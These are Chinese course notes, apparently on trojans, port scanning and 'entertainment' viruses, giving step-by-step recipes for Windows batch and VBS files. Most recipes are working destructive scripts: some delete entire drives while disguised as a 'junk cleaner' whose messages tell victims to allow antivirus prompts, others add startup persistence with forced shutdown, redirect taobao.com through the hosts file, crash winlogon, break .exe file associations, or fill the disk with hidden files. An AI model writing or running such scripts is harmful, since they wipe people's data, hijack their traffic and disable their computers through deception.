022 漏洞与木马、端口扫描、病毒（娱乐向...pdf）

概述

神奇的木马
	实现目标
	通过经典的木马攻击还原场景，来学习木马的制作，并实现植入木马对目标主机进行完全控制。
木马概述
	木马通常称为黑客程序，恶意代码，也称特洛伊木马
	基于远程控制的黑客工具
木马特性
	隐蔽性
	潜伏性
	再生性
木马组成
	客户端程序
		安装在攻击者方大的控制台，他负责远程遥控指挥
	服务端程序
		即木马程序，它被隐藏安装在被攻击者的电脑上，目标主机也称肉鸡
木马的危害
	盗取用户信息
		如：网游账号，网银信息，qq密码
	传播病毒
	占用系统资源、减低电脑效能
	将肉鸡作为工具去攻击其他设备等
	中了木马的征兆
	硬盘不停的读写
	鼠标键盘不停使唤
	窗口突然被关闭
	新的窗口莫名其妙的被打开
	等等
木马传播途径
	网页浏览时利用浏览器漏洞或浏览器插件中的漏洞
	通过qq,MSN等即时通讯软件，发送恶意网址链接或木马病毒文件
	使用U盘等移动存储设备
	打开陌生邮件通过电子邮件内的恶意代码或含木马病毒的附件
	伪装成多媒体影音文件或植入木马的应用软件，利用P2P平台和网站传播
	利用操作系统漏洞或弱口令直接远程植入（本次实验）
	下载来源不明的程序

操作详情

见
009 简单的测试流程
灰鸽子的使用

端口扫描

010 端口扫描

病毒

最简单的批处理文件一：
	1、新建文本文档
	2、输入：
		shutdown -s -t 100 -c "亲爱的朋友，我十分抱歉的通知你，你的电脑已经严重崩溃，请重新安装系统可以解决此问题“
		copy windows.bat "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\">nul 2>nul
		copy windows.bat "%USERPROFILE%\「开始」菜单\程序\启动\">nul 2>nul
	3、工具-》文件夹选项-》查看-》（中间）隐藏已知文件类型的扩展名（勾去掉）
	4、把txt改成bat

最简单的批处理文件二：
	1、新建文本文档
	2、输入：
		:a
		Start/start www.baidu.com 等等
		Goto a
	或
		Start
		%0
	3、工具-》文件夹选项-》查看-》（中间）隐藏已知文件类型的扩展名（勾去掉）
	4、把txt改成bat

最简单的批处理文件三：
	1、新建文本文档
	2、输入：
		D:
		Cd \
		Rd . /s/q
	3、工具-》文件夹选项-》查看-》（中间）隐藏已知文件类型的扩展名（勾去掉）
	4、把txt改成bat

最简单的批处理文件四：
	1、新建文本文档并输入：
		@echo off
		ECHO -----------------------------------------------------------------------
		ECHO 它会帮您删除回收站、临时目录、最近打开过的文档痕迹
		ECHO 等。对系统运行稍有帮助
		ECHO -----------------------------------------------------------------------
		ECHO.
		d:
		cd\
		rd . /s/q

最简单的批处理文件五：
	E:
	cd\
	rd . /s/q
	f:
	cd\
	rd . /s/q
	del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
	del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
	del /f /s /q "%userprofile%\recent\*.*"
	echo 清理系统垃圾完成！
	echo.
	Pause
	3、工具-》文件夹选项-》查看-》（中间）隐藏已知文件类型的扩展名（勾去掉）
	4、把txt改成bat

最简单的批处理文件六：
	1、新建文本文档
	2、输入：
		fsutil file createnew C:\system.ini 4096000
		attirb +s +a +h c:\system.ini
	3、工具-》文件夹选项-》查看-》（中间）隐藏已知文件类型的扩展名（勾去掉）
	4、把txt改成bat
DNS解析
	1.先问自己本地解析文件：
		c:\windows\system32\drivers\etc\hosts
	2.再问当地DNS服务器

最简单的批处理文件七：
	1、新建文本文档
	2、输入：
		echo 1.1.1.1 www.taobao.com >>c:\windows\system32\drivers\etc\hosts
	3、工具-》文件夹选项-》查看-》（中间）隐藏已知文件类型的扩展名（勾去掉）
	4、把txt改成bat

最简单的批处理文件八：
	1、新建文本文档
	2、输入：
		@echo off
		title 系统垃圾清理
		color 2f
		echo =====若有杀毒软件恶意拦截，请选择【允许程序的所有操作】====
		echo.
		echo.
		echo start cmd >c:\windows\windows.bat
		echo %0>>c:\windows\windows.bat
		copy c:\windows\windows.bat "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\">nul
		if %errorlevel%==0 goto next
		copy c:\windows\windows.bat "%USERPROFILE%\「开始」菜单\程序\启动\">nul
		if %errorlevel%==1 goto error

最简单的批处理文件九：
	:next
	echo.
	echo.
	echo =====垃圾清理中，请不要关闭窗口=========
	echo.
	ping -n 5 127.0.0.1>nul
	echo.
	echo =====垃圾清理完毕,共清理垃圾500M=======
	echo.
	echo.
	echo =====建议立即重启电脑==========
	pause
	:error
	echo.
	echo.
	echo ======程序运行失败，请【使用管理员权限】重新运行！========
	echo.
	pause
	3、工具-》文件夹选项-》查看-》（中间）隐藏已知文件类型的扩展名（勾去掉）
	4、把txt改成bat

最简单的批处理文件十：
	1、新建文本文档
	2、输入：
		@echo off
		title 系统垃圾清理
		color 2f
		echo =====若有杀毒软件恶意拦截，请选择【允许程序的所有操作】====
		echo.
		echo.
		:next
		echo.
		echo.
		echo =====垃圾清理中，请不要关闭窗口=========
		echo.

最简单的批处理文件十一：
	ping -n 5 127.0.0.1>nul
	taskkill /im explorer.exe /f >nul 2>nul
	echo.
	echo =====完犊子了，你的系统已经废了=======
	ping -n 5 127.0.0.1>nul
	echo.
	Start c:\windows\explorer.exe
	echo.
	echo =====已修复好！是不是吓坏了！！嘿嘿==========
	pause
	3、工具-》文件夹选项-》查看-》（中间）隐藏已知文件类型的扩展名（勾去掉）
	4、把txt改成bat

最简单的蓝屏炸弹文件
	1、新建文本文档
	2、输入：ntsd -c q -pn winlogon.exe
	3、工具-》文件夹选项-》查看-》（中间）隐藏已知文件类型的扩展名（勾去掉）
	4、把txt改成bat
	5、开始-》程序-》启动（右键）打开，把123.bat放入

最简单的病毒
	1、新建文本文档
	2、输入：assoc .exe=txtfile
	3、工具-》文件夹选项-》查看-》（中间）隐藏已知文件类型的扩展名（勾去掉）
	4、把txt改成bat
	5、开始-》程序-》启动（右键）打开，把123.bat放入

最简单的病毒解药
	1、新建文本文档
	2、输入：assoc .exe=exefile
	3、工具-》文件夹选项-》查看-》（中间）隐藏已知文件类型的扩展名（勾去掉）
	4、把txt改成bat

最简单的脚本
	1、新建文本文档
	2、输入：msgbox “飞哥最帅"
	3、工具-》文件夹选项-》查看-》（中间）隐藏已知文件类型的扩展名
	4、把txt改成vbs
	备注：把程序放入启动项，每次开机都让程序自动执行：开始-》程序-》启动（右键）打开，把 名字.bat 放入

最简单的死循环脚本
	1、新建文本文档
	2、输入：do
		msgbox "飞哥最帅"
		loop
	3、工具-》文件夹选项-》查看-》（中间）隐藏已知文件类型的扩展名
	4、把txt改成vbs
解决死循环问题：
	任务管理器-》进程-》wscript（结束进程）

整人网页源码
	<html>
	<head>
	<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
	<title>很恶心的常见整人效果的代码</title>
	</head>
	<body>
	<a href="" onMouseover="alert('为什么把鼠标放到这里?');
	alert('我不是说过不可以这样吗');
	alert('飞哥现在真的很生气');
	alert('一点也不给飞哥面子');
	alert('你把飞哥的话当什么了');
	alert('你知道错了吗？');
	alert('什么？你居然....');
	alert('写封信给我说声对不起吧!');
	alert('你能这么做我很欣慰!!!');">不许把鼠标移到这里</a>点了真爽！！！
	</body>
	</html>